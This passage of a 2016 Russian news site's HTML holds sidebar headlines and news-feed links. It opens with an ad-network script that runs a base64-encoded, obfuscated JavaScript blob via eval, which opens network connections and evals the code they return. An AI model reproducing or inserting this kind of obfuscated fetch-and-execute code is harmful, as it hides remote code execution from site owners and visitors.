      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNSI7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2FbMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2UsYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow">
    
  <div class="col3-special" id="square-news438561">
    
<a href="/news/2016/11/23/kiselev/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/04/25/thumbs/kiselev1_1479853645.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Дмитрий Киселев" title="Дмитрий Киселев" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Киселев заменил «джунгли» на «пленэр» в сюжете про Обаму
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438560">
    
<a href="/news/2016/11/23/romney/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/04/27/thumbs/romni600-450_1479852362.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Митт Ромни — американский политик." title="Митт Ромни — американский политик." height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      СМИ назвали Ромни главным претендентом на пост главы Госдепа
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438559">
    
<a href="/news/2016/11/23/titov/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/04/16/thumbs/1363164335_050256_64_1479851257.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Бизнес-омбудсмен Борис Титов" title="Бизнес-омбудсмен Борис Титов" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Бизнес-омбудсмен рассказал о новом главе Минэкономразвития
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438558">
    
<a href="/news/2016/11/23/santa/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/12/26/thumbs/santa-5_1479850625.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Санта-Клаус" title="Санта-Клаус" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      В Германии Санта-Клаусу запретили работать из-за комментария в facebook
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438557">
    
<a href="/news/2016/11/23/syria_fuel/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/10/28/thumbs/konashenkov_1479849624.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Официальный представитель Минобороны РФ Игорь Конашенков на авиабазе «Хмеймим» в Сирии" title="Официальный представитель Минобороны РФ Игорь Конашенков на авиабазе «Хмеймим» в Сирии" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Минобороны растолковало разведданные ЕС о доставке топлива в Сирию
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438506">
    
<a href="/news/2016/11/23/lunacharskiy/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/22/thumbs/doc6cthkuwo6uc12sxht30x_800_480_1479818077.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Анатолий Луначарский" title="Анатолий Луначарский" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Мемория. Анатолий Луначарский
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438556">
    
<a href="/news/2016/11/22/topilin/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/09/29/thumbs/topilin_1479847558.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Максим Топилин" title="Максим Топилин" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Глава Минтруда пообещал не проводить корпоратив за госсчет
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438555">
    
<a href="/news/2016/11/22/sanctions/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/06/03/thumbs/isisi5_1479845025.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Боевики Исламского государства" title="Боевики Исламского государства" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Вашингтон ввел санкции против трех главарей «Исламского государства»
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438552">
    
<a href="/news/2016/11/22/hp_lenovo/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/10/09/thumbs/%D1%84%D0%B0%D1%81_1479844566.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="ФАС России" title="ФАС России" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      ФАС заподозрила Lenovo и HP в давлении на дилеров
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438554">
    
<a href="/news/2016/11/22/gosdep/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/02/24/thumbs/giuliani_1479843973.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Бывший мэр Нью-Йорка Рудольф Джулиани" title="Бывший мэр Нью-Йорка Рудольф Джулиани" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      СМИ назвали еще одного претентента на пост главы Госдепа
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438553">
    
<a href="/news/2016/11/22/trust/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/04/18/thumbs/air-2_1479841572.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Паспортный контроль в аэропорту Борисполь" title="Паспортный контроль в аэропорту Борисполь" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Украина задержала экс-главу банка «Траст» по запросу РФ
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438549">
    
<a href="/news/2016/11/22/minoborony_funeral/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/06/14/thumbs/GRI_9813-1_1479840882.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Заседание Минобороны" title="Заседание Минобороны" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      СМИ узнали о расходах Минобороны на похороны военнослужащих
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news438551">
    
<a href="/news/2016/11/22/opcw/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/10/31/thumbs/%D0%9E%D0%97%D0%A5%D0%9E_1479837394.gif.0x142_q85_crop_cropsize-190x142.jpg" alt="Эмблема ОЗХО" title="Эмблема ОЗХО" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      ОЗХО согласилась принять от Москвы пробы примененного боевиками в Сирии химоружия
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">
  <div class="left-or-right-top-banner-slot"></div>
  <h4 class="subject">Главные новости</h4>

<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/11/14/thumbs/2_800-600_1479824570.jpg.88x66_q85.jpg" alt="Президент России Владимир Путин и Дмитрий Медведев" title="Президент России Владимир Путин и Дмитрий Медведев" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/22/contrsanc/" class="hover">Путин пообещал тянуть с отменой контрсанкций</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2015/02/17/thumbs/4104862986_2eb68e0317_z_1479823743.jpg.88x66_q85.jpg" alt="Флаг Украины" title="Флаг Украины" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/22/russians_arrest/" class="hover">На Украине арестованы задержанные на границе с Крымом военные РФ</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/08/12/thumbs/ucoz_1479822825.jpg.88x66_q85.jpg" alt="ЮКОС" title="ЮКОС" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/22/rosnano/" class="hover">Путин рассказал о создании «Роснано» на деньги от продажи активов ЮКОСа</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2015/09/24/thumbs/iskander1_1479830128.jpg.88x66_q85.jpg" alt="«Искандер-М»" title="«Искандер-М»" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/22/not_europeans/" class="hover">Минобороны объяснило переброску «Искандеров» «солдатами-неевропейцами»</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2016/09/21/thumbs/Stealth-Destroyer_Semp-1024x657_1479829444.jpg.88x66_q85.jpg" alt="USS Zumwalt" title="USS Zumwalt" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/22/zumwalt/" class="hover">Суперэсминец США сломался в Панамском канале</a>
      </div>
    </div>
  
</div>



  
<div class="archive-calendar"><a href="/news/">Архив новостей</a></div>
<script type="text/javascript">
  function mkday(y,m,d) { return parseInt((new Date(y,m-1,d)).getTime() / 86400000); }
  var politcal_dates = [mkday(2016,11,1),mkday(2016,11,2),mkday(2016,11,3),mkday(2016,11,4),mkday(2016,11,5),mkday(2016,11,6),mkday(2016,11,7),mkday(2016,11,8),mkday(2016,11,9),mkday(2016,11,10),mkday(2016,11,11),mkday(2016,11,12),mkday(2016,11,13),mkday(2016,11,14),mkday(2016,11,15),mkday(2016,11,16),mkday(2016,11,17),mkday(2016,11,18),mkday(2016,11,19),mkday(2016,11,20),mkday(2016,11,21),mkday(2016,11,22),mkday(2016,11,23)].join(',');
  var calendar_type = "news";
</script>

<div id="politcal"></div>

<script charset="utf-8" src="/static/polit/js/politcal.js" type="text/javascript"></script>



  

  <div class="most-read">
  <h4 class="subject">Самое читаемое</h4>
  
<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/02/28/thumbs/putin-2802-5_1479743950.jpg.88x66_q85.jpg" alt="Владимир Путин" title="Владимир Путин" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/21/putin_nato2/" class="hover">Путин допустил нанесение удара по объектам НАТО</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/11/21/thumbs/1_1479746685.png.88x66_q85.jpg" alt="Кадр из серии «Нашей Раши»" title="Кадр из серии «Нашей Раши»" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/article/2016/11/21/video_russia/" class="hover">Видео дня. О продаже Курильских островов</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/03/21/thumbs/kudrin-2103_1479728629.jpg.88x66_q85.jpg" alt="Алексей Кудрин" title="Алексей Кудрин" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/21/kudrin_refused/" class="hover">Источник сообщил об отказе Кудрина стать министром экономразвития</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/11/15/thumbs/milonov_1479739966.jpg.88x66_q85.jpg" alt="Виталий Милонов со священником" title="Виталий Милонов со священником" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/11/21/milonov/" class="hover">Милонов прокомментировал причисление Роналду к геям</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2016/11/22/thumbs/349c5f0c4fbf843fc9c8993ad7744ed2_YGKx1qU_1479803075.JPG.88x66_q85.jpg" alt="Вячеслав Володин (справа) на пленарном заседании Государственной Думы" title="Вячеслав Володин (справа) на пленарном заседании Государственной Думы" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/article/2016/11/22/duma/" class="hover">Володин ищет способы увеличить роль Думы</a>
      </div>
    </div>
  
</div>

</div>


  
  <div class="front-right-slot"></div>

  

  
<div class="news-lenta">

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">01:27</span>
            </span><a href="/news/2016/11/23/kiselev/" class="hover">Киселев заменил «джунгли» на «пленэр» в сюжете про Обаму</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">01:06</span>
            </span><a href="/news/2016/11/23/romney/" class="hover">СМИ назвали Ромни главным претендентом на пост главы Госдепа</a>
        </div>
    
<div class="news-right-slot2"></div>
    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">00:47</span>
            </span><a href="/news/2016/11/23/titov/" class="hover">Бизнес-омбудсмен рассказал о новом главе Минэкономразвития</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">00:37</span>
            </span><a href="/news/2016/11/23/santa/" class="hover">В Германии Санта-Клаусу запретили работать из-за комментария в facebook</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">00:20</span>
            </span><a href="/news/2016/11/23/syria_fuel/" class="hover">Минобороны растолковало разведданные ЕС о доставке топлива в Сирию</a>
        </div>
    

    

<div class="zabveniya-block" style="margin: 15px 0;font-family: Arial, Helvetica, sans-serif;">
<h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF;">ЗАБВЕНИЯ.NET</h4>
<a href="/news/2016/11/23/lunacharskiy/">
  <div style="font-weight: bold;font-family: Arial, Helvetica, sans-serif;">Мемория. Анатолий Луначарский</div>
  
    <img src="/media/photolib/2016/11/22/thumbs/doc6cthkuwo6uc12sxht30x_800_480_1479818077.jpg.0x195_q85_crop_cropsize-260x195_upscale.jpg" alt="Анатолий Луначарский" title="Анатолий Луначарский" width="240"/>
  
  <div style="font-family: Arial, Helvetica, sans-serif;">23 ноября 1875 года родился Анатолий Луначарский, нарком просвещения</div>
</a>
</div>


    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 23:45</span>
            </span><a href="/news/2016/11/22/topilin/" class="hover">Глава Минтруда пообещал не проводить корпоратив за госсчет</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 23:03</span>
            </span><a href="/news/2016/11/22/sanctions/" class="hover">Вашингтон ввел санкции против трех главарей «Исламского государства»</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 22:56</span>
            </span><a href="/news/2016/11/22/hp_lenovo/" class="hover">ФАС заподозрила Lenovo и HP в давлении на дилеров</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 22:46</span>
            </span><a href="/news/2016/11/22/gosdep/" class="hover">СМИ назвали еще одного претентента на пост главы Госдепа</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 22:06</span>
            </span><a href="/news/2016/11/22/trust/" class="hover">Украина задержала экс-главу банка «Траст» по запросу РФ</a>
        </div>
    
    </div>
    

    
    <div class="news-right-slot10"></div>
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 21:56</span>
            </span><a href="/news/2016/11/22/minoborony_funeral/" class="hover">СМИ узнали о расходах Минобороны на похороны военнослужащих</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 20:56</span>
            </span><a href="/news/2016/11/22/opcw/" class="hover">ОЗХО согласилась принять от Москвы пробы примененного боевиками в Сирии химоружия</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 20:44</span>
            </span><a href="/news/2016/11/22/exhumation_ban/" class="hover">Суд в Польше отклонил иск о запрете эксгумации одной из жертв крушения Ту-154</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 20:28</span>
            </span><a href="/news/2016/11/22/airfuel/" class="hover">Разведка ЕС обвинила Грецию и Кипр в нарушении антироссийских санкций</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 20:19</span>
            </span><a href="/news/2016/11/22/vladimir_reznik/" class="hover">Суд во второй раз арестовал бывшего ведущего программы «Суд идет»</a>
        </div>
    

    
    
    <div class="news-right-slot"></div>
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 20:07</span>
            </span><a href="/news/2016/11/22/inappropriate/" class="hover">Основанный Трампом фонд попался на нарушении законов о налогах</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 19:50</span>
            </span><a href="/news/2016/11/22/kirill_birthday/" class="hover">Путин и Медведев поздравили патриарха Кирилла с 70-летием</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 19:39</span>
            </span><a href="/news/2016/11/22/mirotvorets/" class="hover">Сайт «Миротворец» выложил анкеты похищенных из Крыма военных</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 19:12</span>
            </span><a href="/news/2016/11/22/gromov_kirilenko/" class="hover">Названы имена новых кураторов СМИ в администрации президента</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 19:03</span>
            </span><a href="/news/2016/11/22/nanny_treatment/" class="hover">Убившую девочку няню попросили отправить на лечение</a>
        </div>
    

    
    
    
    <div class="news-right-slot20"></div>
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:55</span>
            </span><a href="/news/2016/11/22/not_europeans/" class="hover">Минобороны объяснило переброску «Искандеров» в Калининград «солдатами-неевропейцами»</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:45</span>
            </span><a href="/news/2016/11/22/zumwalt/" class="hover">Суперэсминец США сломался в Панамском канале</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:34</span>
            </span><a href="/news/2016/11/22/military_cooperation/" class="hover">Путин сделал секретными сведения о ВТС с другими странами</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:30</span>
            </span><a href="/news/2016/11/22/marchukov/" class="hover">Российского контрактника уволили из-за отказа ехать в Донбасс </a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:13</span>
            </span><a href="/news/2016/11/22/clinton_case/" class="hover">Штаб Трампа заявил об отсутствии планов возбуждать дело против Клинтон</a>
        </div>
    

    
    
    
    
    <div class="news-right-slot25"></div>
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:01</span>
            </span><a href="/news/2016/11/22/duritskaya/" class="hover">Суд огласит ранее данные показания Дурицкой без ее присутствия</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 18:00</span>
            </span><a href="/news/2016/11/22/bagdasaryan/" class="hover">Суд оштрафовал Багдасарян еще на 29 тысяч рублей</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 17:46</span>
            </span><a href="/news/2016/11/22/bydeikin/" class="hover">Администратору «группы смерти» предъявили обвинение</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 17:41</span>
            </span><a href="/news/2016/11/22/ulukaev/" class="hover">Путин исключил Улюкаева из президентского совета</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 17:24</span>
            </span><a href="/news/2016/11/22/contrsanc/" class="hover">Путин пообещал тянуть с отменой контрсанкций</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\240x400\0 */
google_ad_slot = "2380101327";
google_ad_width = 240;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 17:20</span>
            </span><a href="/news/2016/11/22/tlectoral_college/" class="hover">Демократы-выборщики призвали республиканцев голосовать против Трампа</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 17:09</span>
            </span><a href="/news/2016/11/22/russians_arrest/" class="hover">На Украине арестованы задержанные на границе с Крымом российские военные</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 17:01</span>
            </span><a href="/news/2016/11/22/petrosyan/" class="hover">Захватчика отделения «Сити-банка» обвинили в терроризме</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 16:53</span>
            </span><a href="/news/2016/11/22/rosnano/" class="hover">Путин рассказал о создании «Роснано» на деньги от продажи активов ЮКОСа</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 16:49</span>
            </span><a href="/news/2016/11/22/dumping/" class="hover">Путин рассказал о личном вмешательстве в проблему незаконных свалок</a>
        </div>
    

    
    
    
    
    
    
    <div class="news-right-slot35"></div>

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 16:30</span>
            </span><a href="/news/2016/11/22/karimova_poisoning/" class="hover">Источники опровергли сообщения СМИ об убийстве дочери Ислама Каримова</a>
